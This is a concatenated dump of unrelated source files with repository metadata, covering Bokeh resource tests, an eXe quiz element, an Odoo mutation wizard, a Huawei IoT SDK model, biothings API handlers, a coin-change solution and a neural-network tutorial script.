95157c9156dc3020513173a363cd01d4530d332b | 498fd33fcb93ea53ae8b55565a3cfac0d80ad424 | /bokeh/tests/test_resources.py | 7ce32ce4690d703e8eb5b44383cfe9d63b561639 | [] | no_license | HyperionAnalytics/bokeh | c23104978988a507e08dcf70894258bcd3562274 | 7d889505a2ec069041dbfa3daf70395e473c3bac | refs/heads/master | 2020-04-06T06:27:08.442860 | 2014-08-26T14:29:06 | 2014-08-26T14:29:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,223 | py | import unittest
import bokeh
import bokeh.resources as resources
WRAPPER = """$(function() {
foo
});"""
WRAPPER_DEV = '''require(["jquery", "main"], function($, Bokeh) {
$(function() {
foo
});
});'''
class TestResources(unittest.TestCase):
def test_basic(self):
r = resources.Resources()
self.assertEqual(r.mode, "inline")
def test_module_attrs(self):
self.assertEqual(resources.CDN.mode, "cdn")
self.assertEqual(resources.INLINE.mode, "inline")
def test_inline(self):
r = resources.Resources(mode="inline")
self.assertEqual(r.mode, "inline")
self.assertEqual(r.dev, False)
self.assertEqual(len(r.js_raw), 1)
self.assertEqual(len(r.css_raw), 1)
self.assertEqual(r.messages, [])
def test_cdn(self):
resources.__version__ = "1.0"
r = resources.Resources(mode="cdn", version="1.0")
self.assertEqual(r.mode, "cdn")
self.assertEqual(r.dev, False)
self.assertEqual(r.js_raw, [])
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
resources.__version__ = "1.0-1-abc"
r = resources.Resources(mode="cdn", version="1.0")
self.assertEqual(r.messages, [
{'text': "Requesting CDN BokehJS version '1.0' from Bokeh development version '1.0-1-abc'. This configuration is unsupported and may not work!",
'type': 'warn'}
])
def test_server(self):
r = resources.Resources(mode="server")
self.assertEqual(r.mode, "server")
self.assertEqual(r.dev, False)
self.assertEqual(r.js_raw, [])
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_server_dev(self):
r = resources.Resources(mode="server-dev")
self.assertEqual(r.mode, "server")
self.assertEqual(r.dev, True)
self.assertEqual(len(r.js_raw), 1)
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_relative(self):
r = resources.Resources(mode="relative")
self.assertEqual(r.mode, "relative")
self.assertEqual(r.dev, False)
self.assertEqual(r.js_raw, [])
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_relative_dev(self):
r = resources.Resources(mode="relative-dev")
self.assertEqual(r.mode, "relative")
self.assertEqual(r.dev, True)
self.assertEqual(len(r.js_raw), 1)
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_absolute(self):
r = resources.Resources(mode="absolute")
self.assertEqual(r.mode, "absolute")
self.assertEqual(r.dev, False)
self.assertEqual(r.js_raw, [])
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_absolute_dev(self):
r = resources.Resources(mode="absolute-dev")
self.assertEqual(r.mode, "absolute")
self.assertEqual(r.dev, True)
self.assertEqual(len(r.js_raw), 1)
self.assertEqual(r.css_raw, [])
self.assertEqual(r.messages, [])
def test_argument_checks(self):
self.assertRaises(ValueError, resources.Resources, "foo")
for mode in ("inline", "cdn", "server", "server-dev", "absolute", "absolute-dev"):
self.assertRaises(ValueError, resources.Resources, mode, root_dir="foo")
for mode in ("inline", "server", "server-dev", "relative", "relative-dev", "absolute", "absolute-dev"):
self.assertRaises(ValueError, resources.Resources, mode, version="foo")
for mode in ("inline", "cdn", "relative", "relative-dev", "absolute", "absolute-dev"):
self.assertRaises(ValueError, resources.Resources, mode, root_url="foo")
def test_js_wrapper(self):
for mode in ("inline", "server", "cdn", "relative", "absolute"):
r = resources.Resources(mode)
self.assertEqual(r.js_wrapper("foo"), WRAPPER)
for mode in ("server-dev", "relative-dev", "absolute-dev"):
r = resources.Resources(mode)
self.assertEqual(r.js_wrapper("foo"), WRAPPER_DEV)
| [
"bryanv@continuum.io"
] | bryanv@continuum.io |
76cd8a5c69e8f31902f6c1f1bcebb1090e76716d | 24d8cf871b092b2d60fc85d5320e1bc761a7cbe2 | /eXe/rev3426-3457/left-trunk-3457/exe/webui/truefalseelement.py | f15603272a78cf3bc88de0f0603722b248534298 | [] | no_license | joliebig/featurehouse_fstmerge_examples | af1b963537839d13e834f829cf51f8ad5e6ffe76 | 1a99c1788f0eb9f1e5d8c2ced3892d00cd9449ad | refs/heads/master | 2016-09-05T10:24:50.974902 | 2013-03-28T16:28:47 | 2013-03-28T16:28:47 | 9,080,611 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 7,531 | py | """
TrueFalseElement is responsible for a block of question. Used by TrueFalseBlock.
"""
import logging
from exe.webui import common
from exe.webui.element import TextAreaElement
log = logging.getLogger(__name__)
class TrueFalseElement(object):
"""
TrueFalseElement is responsible for a block of question.
Used by TrueFalseBlock.
"""
def __init__(self, index, idevice, question):
"""
Initialize
"""
self.index = index
self.id = unicode(index) + "b" + idevice.id
self.idevice = idevice
self.question = question
if question.questionTextArea.idevice is None:
question.questionTextArea.idevice = idevice
if question.feedbackTextArea.idevice is None:
question.feedbackTextArea.idevice = idevice
if question.hintTextArea.idevice is None:
question.hintTextArea.idevice = idevice
self.question_question = TextAreaElement(question.questionTextArea)
self.question_feedback = TextAreaElement(question.feedbackTextArea)
self.question_hint = TextAreaElement(question.hintTextArea)
self.questionId = "question"+ unicode(index) + "b" + idevice.id
self.question_question.id = self.questionId
self.feedbackId = "feedback" + unicode(index) + "b" + idevice.id
self.question_feedback.id = self.feedbackId
self.hintId = "hint" + unicode(index) + "b" + idevice.id
self.question_hint.id = self.hintId
self.keyId = "Key" + unicode(index) + "b" + idevice.id
def process(self, request):
"""
Process arguments from the web server. Return any which apply to this
element.
"""
log.debug("process " + repr(request.args))
if self.questionId in request.args:
self.question_question.process(request)
if self.hintId in request.args:
self.question_hint.process(request)
if self.keyId in request.args:
if request.args[self.keyId][0] == "true":
self.question.isCorrect = True
log.debug("question " + repr(self.question.isCorrect))
else:
self.question.isCorrect = False
if self.feedbackId in request.args:
self.question_feedback.process(request)
if "action" in request.args and request.args["action"][0] == self.id:
for q_field in self.question.getRichTextFields():
q_field.ReplaceAllInternalAnchorsLinks()
q_field.RemoveAllInternalLinks()
self.idevice.questions.remove(self.question)
def renderEdit(self):
"""
Returns an XHTML string for editing this option element
"""
html = self.question_question.renderEdit()
html += _("True") + " "
html += common.option(self.keyId, self.question.isCorrect, "true")
html += _("False") + " "
html += common.option(self.keyId, not self.question.isCorrect, "false")
html += "<br/><br/>\n"
html += common.elementInstruc(self.idevice.keyInstruc)
html += self.question_feedback.renderEdit()
html += self.question_hint.renderEdit()
html += common.submitImage(self.id, self.idevice.id,
"/images/stock-cancel.png",
_("Delete question"))
html += "<br/><br/>\n"
return html
def renderQuestionView(self):
"""
Returns an XHTML string for viewing this question element
"""
is_preview = 0
html = self.renderQuestion(is_preview)
if self.question.hintTextArea.content<>"":
html += u'<span '
html += u'style="background-image:url(\'panel-amusements.png\');">'
html += u'\n<a onmousedown="Javascript:updateCoords(event);'
html += u'showMe(\'%s\', 350, 100);" ' % self.hintId
html += u'style="cursor:help;align:center;vertical-align:middle;" '
html += u'title="%s" \n' % _(u"Hint")
html += u'href="javascript:void(0);"> </a>'
html += u'</span>'
html += u'<div id="'+self.hintId+'" '
html += u'style="display:none; z-index:99;">'
html += u'<div style="float:right;" >'
html += u'<img alt="%s" ' % _('Close')
html += u'src="stock-stop.png" title="%s"' % _('Close')
html += u" onmousedown=\"Javascript:hideMe();\"/></div>"
html += u'<div class="popupDivLabel">'
html += _(u"Hint")
html += u'</div>\n'
html += self.question_hint.renderView()
html += u"</div>\n"
return html
def renderQuestionPreview(self):
"""
Returns an XHTML string for previewing this question element
"""
is_preview = 1
html = self.renderQuestion(is_preview)
html += " \n"
html += common.elementInstruc(self.question_hint.field.content,
"panel-amusements.png", "Hint")
return html
def renderQuestion(self, is_preview):
"""
Returns an XHTML string for viewing and previewing this question element
"""
log.debug("renderPreview called in the form of renderQuestion")
html = u"<br/><br/>"
if is_preview:
html += self.question_question.renderPreview() + "<br/>"
else:
html += self.question_question.renderView() + "<br/>"
html += _("True") + " "
html += self.__option(0, 2, "true") + " \n"
html += _("False") + " "
html += self.__option(1, 2, "false") + "\n"
return html
def __option(self, index, length, true):
"""Add a option input"""
html = u'<input type="radio" name="option%s" ' % self.id
html += u'id="%s%s" ' % (true, self.id)
html += u'onclick="getFeedback(%d,%d,\'%s\',\'truefalse\')"/>' % (
index, length, self.id)
return html
def renderFeedbackPreview(self):
"""
Merely a front-end to renderFeedbackView(), setting preview mode.
Note: this won't really matter all that much, since these won't yet
show up in exported printouts, BUT the image paths will be correct.
"""
return self.renderFeedbackView(is_preview=True)
def renderFeedbackView(self, is_preview=False):
"""
return xhtml string for display this option's feedback
"""
feedbackStr1 = _(u"Correct!") + " "
feedbackStr2 = _(u"Incorrect!") + " "
if not self.question.isCorrect:
feedbackStr1, feedbackStr2 = feedbackStr2, feedbackStr1
feedbackId1 = "0" + "b" + self.id
feedbackId2 = "1" + "b" + self.id
html = u'<div id="s%s" style="color: rgb(0, 51, 204);' % feedbackId1
html += u'display: none;">'
html += feedbackStr1 + '</div>\n'
html += u'<div id="s%s" style="color: rgb(0, 51, 204);' % feedbackId2
html += u'display: none;">'
html += feedbackStr2 + '</div>\n'
html += u'<div id="sfbk%s" style="color: rgb(0, 51, 204);' % self.id
html += u'display: none;">'
if is_preview:
html += self.question_feedback.renderPreview()
else:
html += self.question_feedback.renderView()
html += u'</div>\n'
return html
| [
"joliebig@fim.uni-passau.de"
] | joliebig@fim.uni-passau.de |
ea506ef01a97b930d0c98568de59edafa60481e6 | 7c7a0c7a3c52f1c3b8a504a7ed671647695137e0 | /venv/Scripts/pip-script.py | df90d1ed47de1a88d92f27de1c497534c8d75080 | [] | no_license | mdShakilHossainNsu2018/official_django | 6fd7ee8673c35ddcd1f9d5a89fac4f32b19ac27c | bfb1bbd198888abcd84dffc4d7e83faeb448b1e2 | refs/heads/master | 2022-04-26T10:37:05.521377 | 2020-04-29T21:20:29 | 2020-04-29T21:20:29 | 259,578,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | #!C:\Users\shaki\PycharmProjects\official_django\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip')()
)
| [
"shakilnsu2018@gmail.com"
] | shakilnsu2018@gmail.com |
9b17f09e95d1c31eb22816739bc460fffcf1885d | 21f98d8bb31264c94e7a98fb8eb806d7f5bd396e | /322_Coin_Change.py | 78e841de38e65f2f56347f24746e9b37d96a52fe | [] | no_license | mcfair/Algo | e1500d862a685e598ab85e8ed5b68170632fdfd0 | 051e2a9f6c918907cc8b665353c46042e7674e66 | refs/heads/master | 2021-10-31T01:25:46.917428 | 2021-10-08T04:52:44 | 2021-10-08T04:52:44 | 141,460,584 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | class Solution(object):
def coinChange(self, coins, amount):
"""
:type coins: List[int]
:type amount: int
:rtype: int
"""
#unlimited coin change
#need[b] := #of coins to make a change 'b'
need =[0] + [float('inf')]*amount
for c in coins:
for b in range(c, amount+1):
need[b] = min(need[b], need[b-c]+1)
return need[amount] if need[amount] < float('inf') else -1
| [
"noreply@github.com"
] | mcfair.noreply@github.com |
23df93d317d5228698133b7e6d3e0235c71ba6cc | 5bd5de114f8a0721cee58bb3eb9d993095fd0876 | /stock_custom/wizard_product_mutation.py | 9261875ecf31147486afcafadbedbf20feee8f14 | [] | no_license | hendrasaputra0501/o7kite_dmst | 35ce25494cf536873f3b6eaffc4a78bf02ddeb42 | e8ea609541b831511ba1f3f688d97732dfa879da | refs/heads/master | 2020-04-25T01:31:33.471461 | 2019-02-25T01:48:07 | 2019-02-25T01:48:07 | 172,410,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,857 | py | from openerp.osv import fields,osv
import openerp.addons.decimal_precision as dp
from tools.translate import _
from lxml import etree
from openerp.osv.orm import setup_modifiers
from datetime import datetime
import time
class wizard_product_mutation(osv.osv_memory):
_inherit = "wizard.product.mutation"
def action_open_window(self, cr, uid, ids, context=None):
""" To open products mutation to given duration/period
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param ids: An ID or list of IDs (but only the first ID will be processed)
@param context: A standard dictionary
@return: dictionary of action act_window product
"""
if context is None:
context = {}
wizard = self.read(cr, uid, ids, ['from_date', 'to_date','product_type'], context=context)
if wizard:
data_obj = self.pool.get('ir.model.data')
domain = []
if wizard[0]['product_type']=='finish_good':
res_model = 'product.blend'
result = data_obj._get_id(cr, uid, 'stock_custom', 'view_product_blend_tree2_mutation')
elif wizard[0]['product_type']=='raw_material':
res_model = 'product.rm.category'
result = data_obj._get_id(cr, uid, 'stock_custom', 'view_product_rm_category_tree2_mutation')
else:
res_model = 'product.product'
result = data_obj._get_id(cr, uid, 'master_data_custom', 'view_product_tree2_mutation')
domain = [('product_type','=',wizard[0]['product_type']),('type','<>','service')]
view_id = data_obj.browse(cr, uid, result).res_id
from_date = wizard[0]['from_date']!=False and \
datetime.strptime(wizard[0]['from_date'],'%Y-%m-%d').strftime('%Y-%m-%d 00:00:00') or False
to_date = wizard[0]['to_date'] and \
datetime.strptime(wizard[0]['to_date'],'%Y-%m-%d').strftime('%Y-%m-%d 23:59:59') or False
return {
'name': _('Laporan Pertanggungjawaban Mutasi'),
'view_type': 'form',
'view_mode': 'tree',
'res_model': res_model,
'view_id':[view_id],
'type': 'ir.actions.act_window',
'context': {'from_date': from_date or False,
'to_date': to_date or False,},
"domain":domain,
}
def export_excel(self, cr, uid, ids, context=None):
if context is None:
context = {}
wizard = self.browse(cr,uid,ids,context)[0]
datas = {
'model': 'wizard.product.mutation',
'from_date' : wizard.from_date,
'to_date' : wizard.to_date,
'product_type':wizard.product_type,
}
if wizard.product_type=='finish_good':
report_name = 'blend.mutation.report.xls'
elif wizard.product_type=='raw_material':
report_name = 'rm.categ.mutation.report.xls'
else:
report_name = 'product.mutation.report.xls'
return {
'type': 'ir.actions.report.xml',
'report_name': report_name,
'report_type': 'xls',
'datas': datas,
}
wizard_product_mutation() | [
"hendrasaputra0501@gmail.com"
] | hendrasaputra0501@gmail.com |
8a84fe7bc3c0fc0894fde1bfc9b969fb327fa136 | 34de2b3ef4a2478fc6a03ea3b5990dd267d20d2d | /Python/_python_modules/unittest/fibonacci.py | e9cb48c6099d63569124520d21159f163deb6452 | [
"MIT"
] | permissive | bhishanpdl/Programming | d4310f86e1d9ac35483191526710caa25b5f138e | 9654c253c598405a22cc96dfa1497406c0bd0990 | refs/heads/master | 2020-03-26T06:19:01.588451 | 2019-08-21T18:09:59 | 2019-08-21T18:09:59 | 69,140,073 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | #!python
# -*- coding: utf-8 -*-
#
# Author : Bhishan Poudel, Physics PhD Student, Ohio University
# Date : Jul 21, 2017 Fri
# Last update :
#
# Imports
import doctest
def fib(n):
"""
Calculates the n-th Fibonacci number iteratively
>>> fib(0)
0
>>> fib(1)
1
>>> fib(10)
55
>>> fib(15)
6100
>>>
"""
a, b = 0, 1
for i in range(n):
a, b = b, a + b
return a
if __name__ == "__main__":
doctest.testmod()
| [
"bhishantryphysics@gmail.com"
] | bhishantryphysics@gmail.com |
59448244030550a58a263906206bc941679ee131 | be084131635850062abd17cdb037e1161725f56c | /Wrapping/Python/vtkvtg/hybrid.py | 04d45a20d6423b8e7e85073c18afbe7c0ddb846e | [] | no_license | emonson/vtkVTG | 177a80820e27aad7fc9fb1d7b14cee4155166d00 | 767f35ae18142133f7ffd1a9ea6c22dfd59acac7 | refs/heads/master | 2016-09-10T00:53:25.613217 | 2012-06-05T14:45:12 | 2012-06-05T14:45:12 | 699,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | """ This module loads all the classes from the VTK Hybrid library into its
namespace. This is a required module."""
import os
if os.name == 'posix':
from libvtkvtgHybridPython import *
else:
from vtkvtgHybridPython import *
| [
"emonson@cs.duke.edu"
] | emonson@cs.duke.edu |
a665cbf59a3147d170e05d21793e326740771fb1 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-iotanalytics/huaweicloudsdkiotanalytics/v1/model/node_content_req.py | 7ecc68c267ff4a458e37e65c2f437fbb9f4b3b61 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 3,960 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class NodeContentReq:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'site_id': 'str',
'sqllist': 'list[str]'
}
attribute_map = {
'site_id': 'site_id',
'sqllist': 'sqllist'
}
def __init__(self, site_id=None, sqllist=None):
"""NodeContentReq
The model defined in huaweicloud sdk
:param site_id: 节点实例ID
:type site_id: str
:param sqllist: SQL列表,将指定边缘平台节点的数字孪生模型实例数据转发到中心平台节点。
:type sqllist: list[str]
"""
self._site_id = None
self._sqllist = None
self.discriminator = None
self.site_id = site_id
self.sqllist = sqllist
@property
def site_id(self):
"""Gets the site_id of this NodeContentReq.
节点实例ID
:return: The site_id of this NodeContentReq.
:rtype: str
"""
return self._site_id
@site_id.setter
def site_id(self, site_id):
"""Sets the site_id of this NodeContentReq.
节点实例ID
:param site_id: The site_id of this NodeContentReq.
:type site_id: str
"""
self._site_id = site_id
@property
def sqllist(self):
"""Gets the sqllist of this NodeContentReq.
SQL列表,将指定边缘平台节点的数字孪生模型实例数据转发到中心平台节点。
:return: The sqllist of this NodeContentReq.
:rtype: list[str]
"""
return self._sqllist
@sqllist.setter
def sqllist(self, sqllist):
"""Sets the sqllist of this NodeContentReq.
SQL列表,将指定边缘平台节点的数字孪生模型实例数据转发到中心平台节点。
:param sqllist: The sqllist of this NodeContentReq.
:type sqllist: list[str]
"""
self._sqllist = sqllist
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NodeContentReq):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
3f23307214e7a4e5dcc595c860deb926e71ab218 | 7437e6b58750275933939321b6b9dc5eb6891a1c | /biothings/hub/api/handlers/source.py | 0750920b7dd125ff13da9436d4c14eedf13e5bc6 | [
"Apache-2.0"
] | permissive | Quiltomics/biothings.api | b6caa939a90e0fd1db35124b64ecdc34babdf5c7 | ab54243e8833888e0331a988a2a13907d17442ad | refs/heads/master | 2020-04-23T12:54:16.731641 | 2019-02-16T17:43:28 | 2019-02-16T19:07:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,801 | py | import asyncio
import logging
import tornado.web
from collections import OrderedDict
from .base import BaseHandler
from biothings.utils.dataload import to_boolean
class SourceHandler(BaseHandler):
def sumup_source(self,src):
"""Return minimal info about src"""
mini = OrderedDict()
mini["name"] = src["name"]
mini["release"] = src.get("release")
if src.get("download"):
mini["download"] = {
"status" : src["download"].get("status"),
"time" : src["download"].get("time"),
"started_at" : src["download"].get("started_at")
}
mini["download"]["dumper"] = src["download"].get("dumper",{})
if src["download"].get("err"):
mini["download"]["error"] = src["download"]["err"]
count = 0
if src.get("upload"):
mini["upload"] = {}
all_status = set()
if len(src["upload"]["jobs"]) > 1:
for job,info in src["upload"]["jobs"].items():
mini["upload"][job] = {
"time" : info.get("time"),
"status" : info.get("status"),
"count" : info.get("count"),
"started_at" : info.get("started_at")
}
count += info.get("count") or 0
all_status.add(info["status"])
if len(all_status) == 1:
mini["upload"]["status"] = all_status.pop()
elif "uploading" in all_status:
mini["upload"]["status"] = "uploading"
else:
job,info = list(src["upload"]["jobs"].items())[0]
mini["upload"][job] = {
"time" : info.get("time"),
"status" : info.get("status"),
"count" : info.get("count"),
"started_at" : info.get("started_at")
}
count += info.get("count") or 0
mini["upload"]["status"] = info.get("status")
if src["upload"].get("err"):
mini["upload"]["error"] = src["upload"]["err"]
if src.get("locked"):
mini["locked"] = src["locked"]
mini["count"] = count
return mini
def get_sources(self,debug=False):
dm = self.managers.get("dump_manager")
um = self.managers.get("upload_manager")
sources = {}
if dm:
srcs = dm.source_info()
if debug:
for src in srcs:
sources[src["name"]] = src
else:
for src in srcs:
sources[src["name"]] = self.sumup_source(src)
# complete with uploader info
if um:
srcs = um.source_info()
dsrcs = dict([(src["name"],src) for src in srcs])
for src_name in um.register.keys():
# collection-only source don't have dumpers and only exist in
# the uploader manager
up_info = dsrcs.get(src_name,{"name":src_name})
if not src_name in dm.register:
sources[src_name] = self.sumup_source(up_info)
if up_info.get("upload"):
for subname in up_info["upload"].get("jobs",{}):
sources[up_info["name"]].setdefault("upload",{}).setdefault(subname,{})
sources[up_info["name"]]["upload"][subname]["uploader"] = up_info["upload"]["jobs"][subname]["uploader"]
return list(sources.values())
def get_source(self,name,debug=False):
dm = self.managers.get("dump_manager")
um = self.managers.get("upload_manager")
m = dm or um # whatever available
if m:
src = m.source_info(name)
if not src:
raise tornado.web.HTTPError(404,reason="No such datasource")
else:
return src
else:
raise tornado.web.HTTPError(500,reason="No manager available to fetch information")
@asyncio.coroutine
def get(self,name=None):
debug = to_boolean(self.get_query_argument("debug",False))
if name:
self.write(self.get_source(name,debug))
else:
self.write(self.get_sources(debug))
class DumpSourceHandler(BaseHandler):
def post(self,name):
dm = self.managers.get("dump_manager")
dm.dump_src(name)
self.write({"dump" : name})
class UploadSourceHandler(BaseHandler):
def post(self,name):
um = self.managers.get("upload_manager")
um.upload_src(name)
self.write({"upload" : name})
| [
"slelong@scripps.edu"
] | slelong@scripps.edu |
4f69bce313f30ba5697091f2746782807a09ad1d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_winded.py | a4f8fd77780cbfc22bfc25f69c08d1918a504218 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py |
#calss header
class _WINDED():
def __init__(self,):
self.name = "WINDED"
self.definitions = [u'temporarily unable to breathe, either when hit in the stomach or after taking hard physical exercise: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
feadd1b682627b154efe8b4af6e59c03c941920b | c0344beb70872a4efb097fa3cf39cc1e8d01dd89 | /neural_networks_from_scratch/chap_2.py | a134de791eedf26841bc93dd12ee68e466930106 | [] | no_license | szhongren/nnfs | cb3b819a509545cf7d5d78e18b053b0a238d4f8a | 8e6783745d0d42dcf50f2347d5175857bf290890 | refs/heads/main | 2023-02-16T04:22:04.734752 | 2020-12-11T02:47:01 | 2020-12-11T02:47:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,313 | py | import numpy as np
def main():
print("chap_2")
single_neuron()
single_neuron_alt()
three_neurons()
three_neurons_loop()
dot_product()
single_neuron_numpy()
three_neurons_numpy()
matrix_product()
three_neurons_batched_numpy()
print("=" * 100)
def single_neuron():
inputs = [1, 2, 3]
weights = [0.2, 0.8, -0.5]
bias = 2
# outputs = (
# inputs[0] * weights[0] + inputs[1] * weights[1] + inputs[2] * weights[2] + bias
# )
outputs = sum(map(lambda tup: tup[0] * tup[1], zip(inputs, weights))) + bias
print(outputs)
def single_neuron_alt():
inputs = [1.0, 2.0, 3.0, 2.5]
weights = [0.2, 0.8, -0.5, 1.0]
bias = 2.0
# outputs = (
# inputs[0] * weights[0] + inputs[1] * weights[1] + inputs[2] * weights[2] + bias
# )
outputs = sum(map(lambda tup: tup[0] * tup[1], zip(inputs, weights))) + bias
print(outputs)
def three_neurons():
inputs = [1, 2, 3, 2.5]
weights1 = [0.2, 0.8, -0.5, 1]
weights2 = [0.5, -0.91, 0.26, -0.5]
weights3 = [-0.26, -0.27, 0.17, 0.87]
bias1 = 2
bias2 = 3
bias3 = 0.5
outputs = [
# Neuron 1:
sum(map(lambda tup: tup[0] * tup[1], zip(inputs, weights1))) + bias1,
# Neuron 2:
sum(map(lambda tup: tup[0] * tup[1], zip(inputs, weights2))) + bias2,
# Neuron 3:
sum(map(lambda tup: tup[0] * tup[1], zip(inputs, weights3))) + bias3,
]
print(outputs)
def three_neurons_loop():
inputs = [1, 2, 3, 2.5]
weights = [
[0.2, 0.8, -0.5, 1],
[0.5, -0.91, 0.26, -0.5],
[-0.26, -0.27, 0.17, 0.87],
]
biases = [2, 3, 0.5]
layer_outputs = []
for neuron_weights, neuron_bias in zip(weights, biases):
neuron_output = 0
for n_input, n_weight in zip(inputs, neuron_weights):
neuron_output += n_input * n_weight
neuron_output += neuron_bias
layer_outputs.append(neuron_output)
print(layer_outputs)
def dot_product():
a = [1, 2, 3]
b = [2, 3, 4]
dot_product_result = sum(map(lambda tup: tup[0] * tup[1], zip(a, b)))
print(dot_product_result)
def single_neuron_numpy():
inputs = [1.0, 2.0, 3.0, 2.5]
weights = [0.2, 0.8, -0.5, 1.0]
bias = 2.0
outputs = np.dot(weights, inputs) + bias
print(outputs)
def three_neurons_numpy():
inputs = [1.0, 2.0, 3.0, 2.5]
weights = [
[0.2, 0.8, -0.5, 1],
[0.5, -0.91, 0.26, -0.5],
[-0.26, -0.27, 0.17, 0.87],
]
biases = [2.0, 3.0, 0.5]
# np.dot(weights, inputs) = [
# np.dot(weights[0], inputs),
# np.dot(weights[1], inputs),
# np.dot(weights[2], inputs),
# ]
layer_outputs = np.dot(weights, inputs) + biases
print(layer_outputs)
def matrix_product():
a = [1, 2, 3]
b = [2, 3, 4]
a = np.array([a])
b = np.array([b]).T
result = np.dot(a, b)
print(result)
def three_neurons_batched_numpy():
inputs = [[1.0, 2.0, 3.0, 2.5], [2.0, 5.0, -1.0, 2.0], [-1.5, 2.7, 3.3, -0.8]]
weights = [
[0.2, 0.8, -0.5, 1.0],
[0.5, -0.91, 0.26, -0.5],
[-0.26, -0.27, 0.17, 0.87],
]
biases = [2.0, 3.0, 0.5]
layer_outputs = np.dot(inputs, np.array(weights).T) + biases
print(layer_outputs)
| [
"shao.zhongren@gmail.com"
] | shao.zhongren@gmail.com |
cb83f3868e5f1ba544615d3cbf9eae9e7a063a65 | 861d25fe3985340dae621d179f7af368e0dd7f39 | /stockweb/stock/maintest.py | b0e4d03f456e78a8ad2feb9e649b08d85c6fec21 | [] | no_license | zhuwei302/python | 1ebcfac3e4f208ba81af93d13b8857bea9497862 | dfad635149b8f307ae0eb5b2b8c348843de663bb | refs/heads/master | 2021-01-19T18:44:32.843216 | 2018-09-18T15:17:21 | 2018-09-18T15:17:21 | 101,160,521 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2016/12/20 0020 17:36
# @Author : Aries
# @Site :
# @File : maintest.py
# @Software: PyCharm
if __name__=='__main__':
dic = {'000001':1.32,'20002':1.24,'60003':1.0,'60005':2.1}
new_dic = {}
l = sorted(dic.iteritems(), key=lambda d: d[1], reverse=False)
for i in range(len(l)):
if len(l[i])==2:
new_dic[str(i)+'--'+l[i][0]] = l[i][1]
for key in new_dic.keys():
print new_dic.get(key)
print new_dic | [
"244840434@qq.com"
] | 244840434@qq.com |
